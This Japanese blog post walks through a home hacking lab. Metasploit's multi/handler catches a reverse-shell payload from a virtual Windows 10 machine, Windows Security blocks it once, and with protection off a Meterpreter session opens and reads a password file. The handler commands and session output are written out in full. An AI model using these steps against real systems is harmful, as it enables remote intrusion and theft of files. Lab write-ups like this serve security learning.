【ハッキングラボ】仮想windows10に仕掛けてみる編②【セキュリティ】

＊＊＊＊＊＊＊＊＊＊ 前回の記事 ＊＊＊＊＊＊＊＊＊＊

＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊

６．待ち構える

ウイルスが感染したら，KALIにアクセスできるように待ち受けておきます．

┌──(masaki㉿kali)-[~]
└─$ msfconsole                                                                   130 ⨯

     .:okOOOkdc'           'cdkOOOko:.
   .xOOOOOOOOOOOOc       cOOOOOOOOOOOOx.
  :OOOOOOOOOOOOOOOk,   ,kOOOOOOOOOOOOOOO:
 'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'
 oOOOOOOOO.MMMM.oOOOOoOOOOl.MMMM,OOOOOOOOo
 dOOOOOOOO.MMMMMM.cOOOOOc.MMMMMM,OOOOOOOOx
 lOOOOOOOO.MMMMMMMMM;d;MMMMMMMMM,OOOOOOOOl
 .OOOOOOOO.MMM.;MMMMMMMMMMM;MMMM,OOOOOOOO.
  cOOOOOOO.MMM.OOc.MMMMM'oOO.MMM,OOOOOOOc
   oOOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOOo
    lOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOl
     ;OOOO'MMM.OOOO.MMM:OOOO.MMM;OOOO;
      .dOOo'WM.OOOOocccxOOOO.MX'xOOd.
        ,kOl'M.OOOOOOOOOOOOO.M'dOk,
          :kk;.OOOOOOOOOOOOO.;Ok:
            ;kOOOOOOOOOOOOOOOk:
              ,xOOOOOOOOOOOx,
                .lOOOOOOOl.
                   ,dOd,
                     .
      =[ metasploit v6.0.56-dev                          ]
+ -- --=[ 2154 exploits - 1146 auxiliary - 367 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 8 evasion                                       ]
Metasploit tip: Enable HTTP request and response logging
with set HttpTrace true
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload
payload => generic/shell_reverse_tcp
msf6 exploit(multi/handler) >  set LHOST 192.168.56.111
LHOST => 192.168.56.111
msf6 exploit(multi/handler) > exploit -j -z

７．ウイルス感染（パターン１）

windowsセキュリティをONした状況でダウンロードしたパターンです．

結論から言うと失敗します．

msf6 exploit(multi/handler) > exploit -j -z
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.56.111:4444
msf6 exploit(multi/handler) > [-] Command shell session 1 is not valid and will be closed
[*] 192.168.56.102 - Command shell session 1 closed.
[*] 192.168.56.102 - Command shell session 2 closed.
[*] 192.168.56.102 - Command shell session 3 closed.
[*] 192.168.56.102 - Command shell session 4 closed.
[*] 192.168.56.102 - Command shell session 5 closed.
[*] 192.168.56.102 - Command shell session 6 closed.
[*] 192.168.56.102 - Command shell session 7 closed.
[*] 192.168.56.102 - Command shell session 8 closed.
[*] 192.168.56.102 - Command shell session 9 closed.
[*] 192.168.56.102 - Command shell session 10 closed.
[*] 192.168.56.102 - Command shell session 11 closed.
[-] Command shell session 12 is not valid and will be closed
[*] 192.168.56.102 - Command shell session 12 closed.
[-] Command shell session 13 is not valid and will be closed
[*] 192.168.56.102 - Command shell session 13 closed.
[*] 192.168.56.102 - Command shell session 14 closed.
[-] Command shell session 15 is not valid and will be closed
[*] 192.168.56.102 - Command shell session 15 closed.
[*] 192.168.56.102 - Command shell session 16 closed.
ccccccccccccccccccccccccccInterrupt: use the 'exit' command to quit
msf6 exploit(multi/handler) >

８．ウイルス感染（パターン２）

windowsセキュリティをOFFしてダウンロードしたパターンです．こちらは成功します．アクセスが確立されていることが分かります．

msf6 exploit(multi/handler) > exploit -j -z
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.56.111:4444
msf6 exploit(multi/handler) > [*] Sending stage (200262 bytes) to 192.168.56.102
[*] Meterpreter session 1 opened (192.168.56.111:4444 -> 192.168.56.102:60593) at 2021-10-17 11:13:17 +0900
msf6 exploit(multi/handler) > session -i
[-] Unknown command: session
msf6 exploit(multi/handler) > sessions -i
Active sessions
===============
 Id  Name  Type                   Information            Connection
 --  ----  ----                   -----------            ----------
 1         meterpreter x64/windo  DESKTOP-F0Q8FDQ\masak  192.168.56.111:4444 ->
           ws                     i @ DESKTOP-F0Q8FDQ     192.168.56.102:60593
                                                         (192.168.56.102)

９．侵入実験

ここから，Windows１０に侵入してファイルの中身を見ていきましょう．

pass.txtの中身が判明してしまいました．

msf6 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > pwd
C:\Users\masaki\Downloads
meterpreter > cd ..
meterpreter > cd Documents
meterpreter > ls
Listing: C:\Users\masaki\Documents
==================================
Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
40777/rwxrwxrwx   0     dir   2021-10-10 21:06:47 +0900  My Music
40777/rwxrwxrwx   0     dir   2021-10-10 21:06:47 +0900  My Pictures
40777/rwxrwxrwx   0     dir   2021-10-10 21:06:47 +0900  My Videos
100666/rw-rw-rw-  402   fil   2021-10-10 21:08:51 +0900  desktop.ini
100666/rw-rw-rw-  14    fil   2021-10-17 11:19:21 +0900  pass.txt
meterpreter > cat pass.txt
sample pas txt
meterpreter >

-------------------------------------------------------

また，次回の記事で会いましょう．

#ハッキングラボ

#ハッキング

#セキュリティ

#ペネトレーション

#kali

#kalilinux

#linux

#vbox

#仮想マシン